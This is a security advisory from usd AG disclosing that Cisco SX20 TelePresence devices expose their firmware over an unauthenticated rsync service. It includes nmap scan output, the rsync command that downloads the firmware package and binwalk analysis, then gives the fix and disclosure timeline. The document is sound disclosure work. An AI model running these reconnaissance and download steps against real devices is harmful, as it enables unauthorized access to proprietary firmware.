usd-2018-0035 | Cisco Unified Communications Manager (CallManager)/11.5.1.15900-18 (likely in all versions)

Advisory ID: usd-2018-0035
CVE Number: N/A
Affected Product: Unified Communications Manager
Affected Version: 11.5.1.15900-18 (likely in all versions)
Vulnerability Type: Exposure of Sensitive Configuration Data
Security Risk: Medium
Vendor URL: https://www.cisco.com
Vendor Status: „is not considered to be an exposure“

Description

usd discovered that Cisco SX20 devices allow attackers on the local network to download firmware using rsync without prior authentication. Access to the firmware enables attackers to specifically search for additional vulnerabilities within source code and configuration files.

The Cisco SX20 TelePresence Quick is a set of devices that can be used for video conferencing. Typically they are paired with a screen (e.g. a TV). The SX20 needs to connect to a local network to handle calls and exchange configuration data with the back-end (e.g. the Cisco UCM CallManager). This exposes the device to attackers on the local network.

Proof of Concept

Let 10.10.10.10 be the IP address of a SX20 device.

An nmap scan identifies the following open services:

4043/tcp  open  rsync           (protocol version 29)
4045/tcp  open  lockd?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Kerberos, LPDString, NULL, TLSSessionReq, TerminalServer:
|     version: ce9.4.1 6ae80e1f2ee 2018-08-14
|     method: rsync
|     url: rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg
|_    targets: 102300-3,102310-0,102310-1,101282-0

The following command will download the idefix.pkg file advertised by TCP port 4045:
# rsync rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg .

Using binwalk, the file is identified as a firmware package:
# binwalk idefix.pkg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
3487          0xD9F           PEM certificate
7324          0x1C9C          Executable script, shebang: "/bin/sh"
13549         0x34ED          Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@101:16
13613         0x352D          Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@96:5
13672         0x3568          Unix path: /sys/class/gpio/gpio137/value
13808         0x35F0          Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 44345388 bytes, 5207 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:16:20
44361273      0x2A4E639       uImage header, header size: 64 bytes, header CRC: 0x850DC982, created: 2018-01-22 11:38:34, image size: 210044 bytes, Data Address: 0x80E80000, Entry Point: 0x80E80000, data CRC: 0xEEA65CCC, OS: Firmware, CPU: ARM, image type: Firmware Image, compression type: none, image name: "CISCO firmware 32"
44496781      0x2A6F78D       CRC32 polynomial table, little endian
44505174      0x2A71856       Android bootimg, kernel size: 1684103680 bytes, kernel addr: 0x616D6920, ramdisk size: 1830839655 bytes, ramdisk addr: 0x63696761, product name: "oo long"
44607241      0x2A8A709       CRC32 polynomial table, little endian
44612405      0x2A8BB35       uImage header, header size: 64 bytes, header CRC: 0xC37A01BA, created: 2018-06-05 12:33:35, image size: 20337280 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0xFCCAACDC, OS: Linux, CPU: ARM, image type: RAMDisk Image, compression type: gzip, image name: "CISCO ramdisk 20180605-3a15e0444CertISW"
44613317      0x2A8BEC5       gzip compressed data, from Unix, last modified: 2018-06-05 12:33:25
64949749      0x3DF0DF5       uImage header, header size: 64 bytes, header CRC: 0x1D587465, created: 2018-06-05 12:33:41, image size: 3791880 bytes, Data Address: 0x80008000, Entry Point: 0x80008000, data CRC: 0xC48327A1, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "CISCO kernel 20180605-3a15e04445CertISW"
64967148      0x3DF51EC       gzip compressed data, maximum compression, from Unix, NULL date (1970-01-01 00:00:00)
68741741      0x418EA6D       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 20941005 bytes, 878 inodes, blocksize: 131072 bytes, created: 2018-06-05 12:51:34
89684647      0x5587AA7       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 553758 bytes, 192 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:10:39

Please note that at the point of this writing, usd AG has not performed any additional firmware analysis.

Fix

Enable authentication for the rsync service or disable it if possible.

Timeline

  • 2018-10-31 Advisory has been sent to psirt@cisco.com
  • 2018-11-07 Cisco states that they they do not consider this to be an exposure
  • 2018-11-09 extended public disclosure deadline to 2019-01-23
  • 2019-01-23 Security advisory released

Credits

This security vulnerability was discovered by Marcus Gruber and Maximilian Boehner of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: „more security.“

to usd AG


In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.